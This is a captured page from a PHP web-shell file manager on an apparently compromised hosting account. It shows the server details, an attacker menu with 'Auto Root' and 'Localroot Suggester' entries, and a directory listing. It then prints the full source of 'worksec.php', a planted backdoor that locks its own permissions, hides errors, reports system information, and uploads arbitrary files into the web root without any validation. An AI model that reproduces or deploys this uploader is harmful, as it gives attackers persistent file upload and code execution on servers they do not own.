Linux panel555.harmondns.net 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 5.9.79.124 & Your IP : 216.73.216.138
Domains :
Cant Read [ /etc/named.conf ]
User : examacce
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
examacce /
lscache /
c /
5 /
Delete
Unzip
Name
Size
Permission
Date
Action
2
[ DIR ]
drwxrws---
2026-02-16 08:41
4
[ DIR ]
drwxrws---
2026-02-24 02:41
5
[ DIR ]
drwxrws---
2026-02-24 09:29
6
[ DIR ]
drwxrws---
2026-02-24 02:34
7
[ DIR ]
drwxrws---
2026-02-28 01:34
8
[ DIR ]
drwxrws---
2026-02-27 23:44
b
[ DIR ]
drwxrws---
2026-02-24 09:04
c
[ DIR ]
drwxrws---
2026-02-23 23:01
d
[ DIR ]
drwxrws---
2026-02-24 06:18
e
[ DIR ]
drwxrws---
2026-02-27 15:51
f
[ DIR ]
drwxrws---
2026-02-23 21:26
worksec.php
1.06
KB
-rw-r--r--
2026-05-05 07:11
Save
Rename
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>